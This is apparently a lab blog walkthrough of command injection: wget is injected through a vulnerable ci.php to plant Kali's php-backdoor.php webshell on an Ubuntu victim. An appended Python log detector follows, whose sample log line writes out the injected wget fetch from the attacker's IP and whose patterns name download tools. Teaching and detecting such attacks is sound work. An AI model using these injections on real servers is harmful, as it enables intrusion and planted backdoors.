Thursday, April 12, 2018

Command Injection (III): Webshell -> php-backdoor.php

- Layout for this exercise:

- This exercise is based on the previous one:

- In this exercise let's assume the simplest scenario, where the web-server folder on the Ubuntu victim machine is readable; more complex scenarios are studied in other exercises:

- Starting XAMPP at Ubuntu:

- Also, let's check that ci.php is present at the victim side:

- ci.php is accessible from the attacker Kali Linux via web:

- Now, going to /usr/share/webshells, Kali ships a set of ready-made webshells, usable as attacking tools, for several languages:

- Going to the php folder we find php-backdoor.php:

- Setting a simple HTTP server at the attacker's side:

- Checking that the wget command is available at the victim side:

- Now, the wget command is injected by crafting the URL in Kali's browser (notice that the IP used is Kali's):

- The transaction is successful, because php-backdoor.php is now present at the victim side:

- The simple HTTP server at Kali records the successful transaction:

- Finally, executing php-backdoor.php remotely via the browser is easy.

- Let's notice that there are several attacking options available, for instance uploading files, traversing paths, and also executing SQL injections:

- For instance, traversing to folders where compromising files are present:

- Also, other malicious files could be uploaded, even setting the destination folder:

- The attack is successful because the malicious file has been uploaded to the victim by injecting commands from the attacker's browser:
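The whole chain above, from the injected request to the dropped webshell, leaves a trace in the victim's web-server access log. As an added example, not part of the original post, here is a small Python detector that scans constructed Apache-style log lines (the IPs, timestamps and the parameter name `ip` are assumptions) for query parameters carrying a shell separator or a download tool such as the injected wget:

```python
import re
from urllib.parse import urlparse, unquote_plus

# Constructed Apache-style access-log lines (made up for this example, not
# captured from the lab); the second one carries the injected wget download.
SAMPLE_LOG = """\
192.168.56.101 - - [12/Apr/2018:10:15:01 +0000] "GET /ci.php?ip=127.0.0.1 HTTP/1.1" 200 312
192.168.56.101 - - [12/Apr/2018:10:15:32 +0000] "GET /ci.php?ip=127.0.0.1%3Bwget+http%3A%2F%2F192.168.56.102%3A8000%2Fphp-backdoor.php HTTP/1.1" 200 512
192.168.56.101 - - [12/Apr/2018:10:16:05 +0000] "GET /index.php HTTP/1.1" 200 2048
"""

LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+)[^"]*" (?P<status>\d{3})')

# Shell metacharacters that terminate or chain a command.
SEPARATORS = re.compile(r'[;|&`$\n]')
# Download tools an injected command typically calls to stage a file.
FETCH_TOOLS = re.compile(r'\b(wget|curl|tftp|ftp)\b', re.I)


def decoded_params(query):
    """Split the raw query on '&' and percent-decode each side twice, so an
    encoded separator (%3B) or a double-encoded one is still visible."""
    for pair in query.split('&'):
        key, _, value = pair.partition('=')
        yield unquote_plus(unquote_plus(key)), unquote_plus(unquote_plus(value))


def find_command_injection(log_text):
    """Return (timestamp, source, path, param, reason) for every request
    whose query parameters look like a chained shell command."""
    findings = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        url = urlparse(m['target'])
        for key, value in decoded_params(url.query):
            reasons = []
            if SEPARATORS.search(value):
                reasons.append('shell separator')
            if FETCH_TOOLS.search(value):
                reasons.append('fetch tool')
            if reasons:
                findings.append((m['ts'], m['src'], url.path, key, ' + '.join(reasons)))
    return findings


if __name__ == '__main__':
    for hit in find_command_injection(SAMPLE_LOG):
        print(hit)
```

A follow-up check on the same log is a new `.php` file appearing under the web root shortly after such a request, which is what the successful wget transfer above produces.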